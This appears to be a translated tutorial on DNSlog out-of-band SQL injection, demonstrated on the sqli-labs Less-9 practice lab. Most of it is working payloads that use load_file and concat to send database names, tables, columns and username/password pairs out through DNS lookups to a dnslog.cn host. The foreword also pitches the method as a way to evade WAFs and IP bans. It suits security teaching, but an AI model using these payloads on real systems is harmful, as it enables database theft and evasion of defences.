foreword
If Dns injection is classified, it should be divided into blind injection, but it is more efficient than Boolean blind injection or time blind injection. In some specific environments, if we use time Boolean blind injection or time blind injection to inject, Manual injection will be of great help to bypass waf, but the efficiency is very low. At the same time, we can use sqlmap, but many websites in sqlmap will add you to the blacklist, so that you cannot access the Internet for a certain period of time, that is Lock your ip. At this time, it is generally recommended that if the website has waf, the number of manual bypasses can be reduced, and there is no need to buy some agents. Let this agent run the target website of this sqlmap, and we can try dnslog injection. At the same time, dnslog injection is also a kind of blind injection, but the efficiency of his blind injection will be higher than that of Boolean blind injection or time blind injection. Because both the Boolean blind injection and the time blind injection belong to character-by-character injection, and dnslog injection can be injected in groups or lines. The overall efficiency is much greater than that of Boolean and time blind injection
#Use dnslog to inject prerequisites
Precondition: The target server has enabled read and write permissions (root permission)
(Like file upload and dnslog, if one of them can be done, it also means that both dnslog and file upload can be done together, which also means that if one cannot be done, then you cannot do both)
# key function
Load_file():
The function of the function is to read the file and return the content of the file as a string. To use this function, the file must be located on the server , the full path must be specified , and the file permission must be granted . All bytes of the file are readable, but the file content must be smaller than max_allowed_packet.
Read the haha.txt file under the c drive
Load_file(“c:\\haha.txt”)
The function Load_file() can not only read the local path, but also read other server files on the Internet.
#UNC path
Format: \Servername\sharename, where servername is the name of the server (it can be an IP address or a domain name). sharename is the name of the shared resource, and the UNG name of the directory or file can include the path under the directory under the shared name, in the format: \servername\sharename\filename
Shared Files Overview
Configure shared folders
access shared folder
\\192.168.222.142 : ip address
\share: the folder you need to access
\1.txt: the name of the file you need to access
#DNSlog principle
First, the attacker submits a malicious code, which is equivalent to a path for us to access the UNC address of the sam server. Then put it in the database, and the database will parse the DNS. At this time, he will send the parsed DNS to the DNS server, and a log will be generated. At this time, we can check the log to see what the command he executed is.
Summary: The attacker submits the injection statement, lets the database splice the domain name and value to be queried, and then sends a DNS query. We only need to get the DNS log to get the value we want. So we need to have our own domain name, then configure an NS record at the domain name provider, and then get the DNS log at the NS server provider
It is in this field, because the ip address or domain name should be filled in normally in this position. The so-called dnslog injection is to fill in some domain names
For example, I write a domain name here
Suppose we write a command (select database()) that we execute in front and use . to splice
When the database is queried, it will give priority to querying the (select database()) command (priority execution in brackets). When the (select database()) statement is successfully queried, it will query the content such as Say the name of Security (the current database) is spliced together with the domain name ctfstu.com and put it in front
will become a domain name like this
Then he is going to resolve the domain name and access the files under this domain name (this file is not the point)
The focus is on this part, the content returned after executing our previous statement. It is some database information we injected
Note: (The instruction here is wrong, but it is used as an example)
#Need to use the website
1. http://ceye.io (If it is for personal use and does not change frequently, you can register an account here, including the api interface in it if you use tools to inject)
2. http://www.dnslog.cn (the following cases are used for demonstration)
# www.dnslog.cn tutorial
First click -Get SubDomain
At this point he will give you a domain name
1539yb.dnslog.cn
This domain name is randomly assigned to you
open a page
Randomly type in front of the domain name he configured for you, remember to add a " . "
Then click -> Refresh Record
At this point you can see his analysis record
Randomly generate a different
At this time, another
#Use manual injection statement
And (select load_file(concat(1,2,3))) has a total of three parameters
1: "//" or '/'
2. The sql statement of the query
3. DNS path + any folder
for example
And (select load_file(concat(‘//’,(select database()),”.4tp4b9.dnslog.cn/kk.txt”)))
#case demo
sqli-labs-master/Less-9
1. Determine whether there is an injection point and what method to use to close it
paly load
and sleep(5)
Since the ninth level is the time blind injection, we will use the time blind injection to make a judgment. In actual situations, we choose to use it according to the environment.
url:?id=1' and sleep(5) --+
The page paused for 5 seconds, indicating that it was closed with ' single quotes
2. Get the current database
play load
and (select load_file(concat("//",(select database()), ".your domain name/any file name")))
url:
?id=1' and (select load_file(concat("//",(select database()),".par0nm.dnslog.cn/hh.txt"))) --+
After the carriage return, the page will load for a while, don't worry about it
Open the web page of the dns interface you use, click Refrech Record
At this point, the data name of the current database is obtained.
Database "seucirty"
2. Get all data tables in the database
paly load
?id=1' and (select load_file(concat("//",(select table_name from information_Schema.tables where table_schema=database() limit n,1),".Domain name/random file name"))) --+
query a data table
url:
?id=1' and (select load_file(concat("//",(select table_name from information_Schema.tables where table_schema=database() limit 0,1),".par0nm.dnslog.cn
/hhhh"))) --+
The first data table is: emailis
Query the second data table
url:?id=1' and (select load_file(concat("//",(select table_name from information_schema.tables where table_schema=database() limit 1,1),".par0nm.dnslog.cn
/jjjjjsd")))--+
The second data table is: referers
Query the third data table
?id=1' and (select load_file(concat("//",(select table_name from information_schema.tables where table_schema=database() limit 2,1),".par0nm.dnslog.cn
/jjjjjsd")))--+
The third data table is: uagents
Query the fourth data table
?id=1' and (select load_file(concat("//",(select table_name from information_schema.tables where table_schema=database() limit 3,1),".par0nm.dnslog.cn
/jjjjjsd")))--+
The fourth data table is: users
3. Get all column (field) information
play load
and (select load_file(concat('//',(select column_name from information_Schema.columns where table_schema=database() and table_name="table name" limit n,1), ".domain name/random file name"))) - -+
query the first field
?id=1' and (select load_file(concat('//',(select column_name from information_Schema.columns where table_schema=database() and table_name="users" limit 0,1),".par0nm.dnslog.cn/sudhwi"))) --+
first field id
Query the second field
?id=1' and (select load_file(concat('//',(select column_name from information_Schema.columns where table_schema=database() and table_name="users" limit 1,1),".par0nm.dnslog.cn/sudhwi"))) --+
The second field: username
Query the third field
?id=1' and (select load_file(concat('//',(select column_name from information_Schema.columns where table_schema=database() and table_name="users" limit 2,1),".par0nm.dnslog.cn/sudhwi"))) --+
The third field: password
4. Out of storage
Get the field information of password and username
Because symbols such as @~ cannot be used in load_file, we can use the concat_ws() function to divide the data and then use hex() to convert it into hexadecimal to get the result and load it back.
paly load:
and load_file(concat('\\\\', (select hex(concat_ws('~', field 1, field 2)) from data table limit n, 1), '.domain name\\file name'))-- +
url:
and load_file(concat('\\\\',(select hex(concat_ws('~',username,password)) from users limit 0,1),'.par0nm.dnslog.cn
\\kjsjdhfuehfic'))--+
Convert the hex value
Conversion result:
umb~Dumb
Supplement: Note here is to use limit 0,1 to view the data, line by line
limit 0 , 1; Explanation: the starting point is 0, start query, and return 1 piece of data
limit 1 , 1; Explanation: the starting point is 1, start query, and return 1 piece of data